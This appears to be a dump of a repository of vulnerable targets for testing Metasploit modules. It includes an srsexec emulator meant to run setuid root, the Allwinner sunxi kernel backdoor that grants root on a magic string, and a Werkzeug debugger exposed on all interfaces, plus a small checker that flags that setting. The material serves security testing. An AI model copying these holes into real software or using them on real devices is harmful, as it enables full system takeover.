["QUIT","EXIT"]: 68 | send(" " + input) 69 | input = raw_input("Netis> ").strip() 70 | 71 | -------------------------------------------------------------------------------- /op5-monitor-7.1.9-20160303.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/op5-monitor-7.1.9-20160303.tar.gz -------------------------------------------------------------------------------- /srsexec: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | ''' 4 | Install Instructions: 5 | 6 | This should be run out of the /opt/SUNWsrspx/bin/ folder 7 | 8 | You'll want to set this file's permissions as such: 9 | chown root:sys /opt/SUNWsrspx/bin/srsexec 10 | chmod 555 srsexec 11 | chmod u+s srsexec 12 | 13 | Solaris 10u9 doesn't have argparse, you need to transfer it manually (from pypi.org) and install it to /usr/lib/python2.4/site-packages/ 14 | ''' 15 | 16 | # See https://www.securityfocus.com/archive/1/468235 17 | 18 | import argparse 19 | import sys 20 | import os 21 | import stat 22 | 23 | parser = argparse.ArgumentParser(description='This is a CVE-2007-2617 srsexec emulator') 24 | parser.add_argument('-dvb', nargs=1, type=argparse.FileType('r'), default=sys.stdin, help='File to read in') 25 | parser.add_argument('foobar', nargs=1, help='String, unsure what its purpose is') 26 | 27 | args = parser.parse_args() 28 | 29 | # Create the uninstall files... while this isn't in the real binary, it'll make sure it seems installed correctly for 30 | # our exploitation purposes. See download.oracle.com/sunalerts/1000443.1.html 31 | EMULATED_VERSION = '003.002.004' #'003.002.003' is also vuln, '003.002.005' is not.
32 | # sol10u9 has py 2.4 installed, so no with statement 33 | try: 34 | f = open('/opt/SUNWsrspx/bin/UninstallNetConnect.%s.sh' %(EMULATED_VERSION), 'a') 35 | f.close() 36 | except IOError: 37 | pass #fail silent 38 | 39 | firstline = args.dvb[0].readline() 40 | if firstline.endswith('\n'): 41 | firstline = firstline[:-1] 42 | args.foobar = args.foobar[0] 43 | 44 | print('''verify_binary(%s) 45 | srsexec: binary_name: %s''' %(args.foobar, args.foobar)) 46 | print('srsexec: name_buf: %s' %((args.foobar + '_'*20)[0:20] )) #this line is 20 characters long with the foobar string in the beginning and ending with underscores 47 | i=0 48 | while i<=len(firstline): 49 | print('binaries file line: %s' %(firstline[i:i+20])) 50 | i+=18 # looks like we have a 2 character repeat on the next line kind of thing 51 | 52 | print('smmsp:NP') 53 | print('Security verification failed for binary: %s' %(args.foobar)) 54 | print('see SYSLOG(/var/adm/messages) for errors') 55 | -------------------------------------------------------------------------------- /sunxi-debug.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Sunxi_debug.c 3 | * 4 | * 5 | * This program is free software; you can redistribute it and/or modify 6 | * it under the terms of the GNU General Public License version 2 as 7 | * published by the Free Software Foundation. 
8 | */ 9 | #include <linux/kernel.h> 10 | #include <linux/mm.h> 11 | #include <linux/slab.h> 12 | #include <linux/vmalloc.h> 13 | 14 | #include <linux/debugfs.h> 15 | #include <linux/proc_fs.h> //add by fe3o4 16 | #include <linux/uaccess.h> 17 | #include <linux/cred.h> 18 | 19 | static struct proc_dir_entry *proc_root; 20 | static struct proc_dir_entry * proc_su; 21 | 22 | 23 | static int sunxi_proc_su_write(struct file *file, const char __user *buffer, 24 | unsigned long count, void *data) 25 | { 26 | char *buf; 27 | struct cred *cred; 28 | 29 | if (count < 1) 30 | return -EINVAL; 31 | 32 | buf = kmalloc(count, GFP_KERNEL); 33 | if (!buf) 34 | return -ENOMEM; 35 | 36 | if (copy_from_user(buf, buffer, count)) { 37 | kfree(buf); 38 | return -EFAULT; 39 | } 40 | 41 | if(!strncmp("rootmydevice",(char*)buf,12)){ 42 | cred = (struct cred *)__task_cred(current); 43 | cred->uid = 0; 44 | cred->gid = 0; 45 | cred->suid = 0; 46 | cred->euid = 0; 47 | cred->euid = 0; 48 | cred->egid = 0; 49 | cred->fsuid = 0; 50 | cred->fsgid = 0; 51 | printk("now you are root\n"); 52 | } 53 | 54 | kfree(buf); 55 | return count; 56 | } 57 | 58 | 59 | static int sunxi_proc_su_read(char *page, char **start, off_t off, 60 | int count, int *eof, void *data) 61 | { 62 | printk("sunxi debug: rootmydevice\n"); 63 | return 0; 64 | } 65 | 66 | static int sunxi_root_procfs_attach(void) 67 | { 68 | proc_root = proc_mkdir("sunxi_debug", NULL); 69 | proc_su= create_proc_entry("sunxi_debug", 0666, proc_root); 70 | if (IS_ERR(proc_su)){ 71 | printk("create sunxi_debug dir error\n"); 72 | return -1; 73 | } 74 | proc_su->data = NULL; 75 | proc_su->read_proc = sunxi_proc_su_read; 76 | proc_su->write_proc = sunxi_proc_su_write; 77 | return 0; 78 | 79 | } 80 | 81 | static int sunxi_debug_init(void) 82 | { 83 | int ret; 84 | ret = sunxi_root_procfs_attach(); 85 | printk("===fe3o4==== sunxi_root_procfs_attach ret:%d\n", ret); 86 | if(ret){ 87 | printk("===fe3o4== sunxi_root_procfs_attach failed===\n "); 88 | } 89 | return ret; 90 | } 91 | 92 | subsys_initcall(sunxi_debug_init); 93 | 94 | 
-------------------------------------------------------------------------------- /test_rsa.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /tiki-14.1.tar.gz: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:bcca2e72d89a5c11d32fad4e741c71c3b8d2c2bd4c29601d58c17864345037b2 3 | size 48436906 4 | -------------------------------------------------------------------------------- /werkzeug_console.py: -------------------------------------------------------------------------------- 1 | #from http://werkzeug.pocoo.org/ 2 | from werkzeug.wrappers import Request, Response 3 | 4 | @Request.application 5 | def application(request): 6 | return Response('Example Application. 
Please visit /console for the debugger') 7 | 8 | if __name__ == '__main__': 9 | from werkzeug.serving import run_simple 10 | run_simple('0.0.0.0', 8081, application, use_debugger=True) 11 | --------------------------------------------------------------------------------
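A static check for the setting that werkzeug_console.py demonstrates (the Werkzeug debugger enabled on a non-loopback bind address), as an added example that is not part of this repository. The function name `audit_debugger`, the constructed sample strings and the severity labels are assumptions made for illustration; the check also covers Flask's `app.run(debug=True)`, which goes beyond the single `run_simple` case in the file.

```python
import ast

LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed sample inputs: the first mirrors the launcher in
# werkzeug_console.py, the second is a hardened variant of it.
EXPOSED = '''
from werkzeug.serving import run_simple
run_simple('0.0.0.0', 8081, application, use_debugger=True)
'''
HARDENED = '''
from werkzeug.serving import run_simple
run_simple('127.0.0.1', 8081, application, use_debugger=False)
'''

def _const(node):
    """Return the literal value of an AST node, or None if it is not a literal."""
    return node.value if isinstance(node, ast.Constant) else None

def audit_debugger(source):
    """Flag run_simple()/.run() calls that switch the interactive debugger on."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name not in ("run_simple", "run"):  # heuristic match on the call name
            continue
        kwargs = {kw.arg: _const(kw.value) for kw in node.keywords if kw.arg}
        flag = "use_debugger" if name == "run_simple" else "debug"
        if kwargs.get(flag) is not True:
            continue
        # The bind address is positional argument 0 in both APIs, or the
        # hostname= (Werkzeug) / host= (Flask, default 127.0.0.1) keyword.
        if node.args:
            host = _const(node.args[0])
        elif name == "run_simple":
            host = kwargs.get("hostname")
        else:
            host = kwargs.get("host", "127.0.0.1")
        # A non-literal host resolves to None and is treated as exposed.
        severity = "info" if host in LOOPBACK else "high"
        findings.append({"line": node.lineno, "call": name,
                         "host": host, "severity": severity})
    return findings
```

Running `audit_debugger` over each Python file in a deployment tree gives a quick inventory of launchers that would expose `/console` to the network.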